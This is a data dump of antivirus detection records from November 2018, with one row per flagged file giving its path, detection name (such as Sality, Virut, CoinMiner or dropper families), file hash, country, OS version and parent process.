  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='8236ddcde5eea124ce0d6fc1ea766418e5d9a4de3b731931c26cdaa2324efc1a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:38:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203351-37072147', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5c1d082d\\AVSCAN-20181101-203334-3472C729\\AVSCAN-20181101-203351-37072147', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:33:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155409-79ad09b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ac436997\\AVSCAN-20181101-155336-752DA010\\AVSCAN-20181101-155409-79AD09B3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:54:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='085fb69524edce2fd0dbfe2cf5d960e1d718d511add092069f87eed5a852ea1b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201749-3920831e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-201738-36F3B80A\\AVSCAN-20181101-201749-3920831E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc709709be-ffd5-bf4c-ae85-274f914e1365.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc709709BE-FFD5-BF4C-AE85-274F914E1365.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sdpefilter.exe', filepath='C:\\Program Files\\Hewlett-Packard\\Drive Encryption\\SDPEFilter.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='3196de18e53fc7c8061f5d669d5ec9315697ebdd4811588c3a140360756c11a3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZxJN0qkJck2ZRXKg.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:53:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T17:40:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150419-bdf7f6cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150419-BDF7F6CC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194401-37e6d4f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194401-37E6D4F7', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B501246D6C377C9413E3595C6DED65F3F0B5756AB0B6DEA91429B09A5CAE9044', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:21:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='temp.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDAwNTQ=\\Version_3_2_1_48\\Temp\\Temp.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='C:\\Program Files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095718-9274c6aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095718-9274C6AA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150255-b6460fe5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150255-B6460FE5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150211-6911626a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5e1c00c\\AVSCAN-20181101-150142-63076B81\\AVSCAN-20181101-150211-6911626A', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:02:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photos.exe', filepath='E:\\school\\Local\\งานนักเรียนภาคเรียนที่ 1 ปี 2553\\ผลงานนักเรียน ภ\\งานม.6.1\\Phatcharawan\\Photos\\Photos.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='cd63caa11f603787fa42fa7b043864a8aeb46b4b300cf4cc7231c5f5f48189b8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BAA5D62AD4E67869CD3F251D88971F961902A01438F690B4192805A0C266AF6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='baa5d62ad4e67869cd3f251d88971f961902a01438f690b4192805a0c266af6d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150632-d784b212', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150632-D784B212', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:06:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1f3p5msfxyw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152031-7845e8d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152031-7845E8D2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213318-40a262c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213318-40A262C8', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234845-b086f61b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234845-B086F61B', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083524-66b5a517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083524-66B5A517', filesize=20000, name='TR/Agent.40960.AH.#M1.#R1'), hash='a57b4e207d23dc92e5b319a31a9d561bf10d6c61a376e1f028274b22ac92bfd3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145819-790e6083', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145819-790E6083', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-072241-f74b0f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7005a0b\\AVSCAN-20181101-072119-EBE393B5\\AVSCAN-20181101-072241-F74B0F96', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b0a3b047cfeb2de4454612b57d453577fb504670c64636565922381fa7c5fa0b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142609-6eba70a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81949114\\AVSCAN-20181101-085743-41FE8D83\\AVSCAN-20181101-142609-6EBA70A7', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='e1e7c88cdfd27778cf4e4b7f08f96cc93f2931aa3a672ebd784a5065bf6a3548', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:26:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194539-42bcfd2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194539-42BCFD2B', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\7zO0354B1AE\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\New\\\\\\\\Removable Disk\\\\\\\\patches and crachs\\\\\\\\patches and cracks.rar\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\7-Zip\\7zFM.exe', parentsize=431104, timestamp='2018-11-04T14:38:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152728-71bcf9ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152728-71BCF9ED', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:27:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023c94', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023c94', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155217-d5ee06e1', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155217-D5EE06E1', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1b74ea7b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1b74ea7b.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-052356-77cbe96b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b14a625e\\AVSCAN-20181104-052338-746475A8\\AVSCAN-20181104-052356-77CBE96B', filesize=1408000, name='TR/Orsam.A.9368.#M1.#R1'), hash='324518c10ae1dfff7ac0cf6dbc606493c1f7e0bb7072402c2fb2afd126d817f2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:23:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='de_freeformmeshwarp_win.exe', filepath='\\\\?\\D:\\Plugins\\After Effects\\hoot009_AE.CS4-CS5.Plugins.Collection\\ImDigiEffects Plugins for After Effects CS4-CS5 now\\DigiEffects.FreeForm.Mesh.Warp.v1.62.for.After.Effects.CS4-SCOTCH\\DE_FreeformMeshWarp_Win.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='6283442fb67937a51312dc53525d3d8db9b2d23569dfc8ca8a425bc97dce9030', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151945-20e767db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151945-20E767DB', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122119-9980c29e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122119-9980C29E', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:03:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdpmkv.dll', filepath='\\\\?\\C:\\Program Files\\Wondershare\\MobileGo for Android\\MultimediaLibs\\DecPlugins\\fdpMKV.dll', filesize=556000, name='W32/Ramnit.C.#M1.#R1'), hash='66cdb332d0a97cd62226c84c0e692d9b3da1ab2299491f624559a470ac1d5852', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124154-6254ee34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9665639e\\AVSCAN-20181104-124008-5872501E\\AVSCAN-20181104-124154-6254EE34', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec48', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec48', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:27:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='224390.doc', filepath='224390.doc', filesize=192000, name='W97M/Agent.3972612.#M0.#R0'), hash='4b08853637672e926c40a95969923f28babf6aa38307ffbd27d63ade55725d36', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:50:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091012-6ad13915', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-091012-6AD13915', filesize=640000, name='TR/AD.Nymaim.Y.#M1.#R1'), hash='3679bb5dcf31dfb6c85aa5326b11b81749ab3651431c73c8e1cbe9c871f613d6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:10:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T21:50:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152148-aad5fdfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-152116-A748C165\\AVSCAN-20181104-152148-AAD5FDFB', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:21:41Z'), dt=datetime.date(2018, 11, 4)),
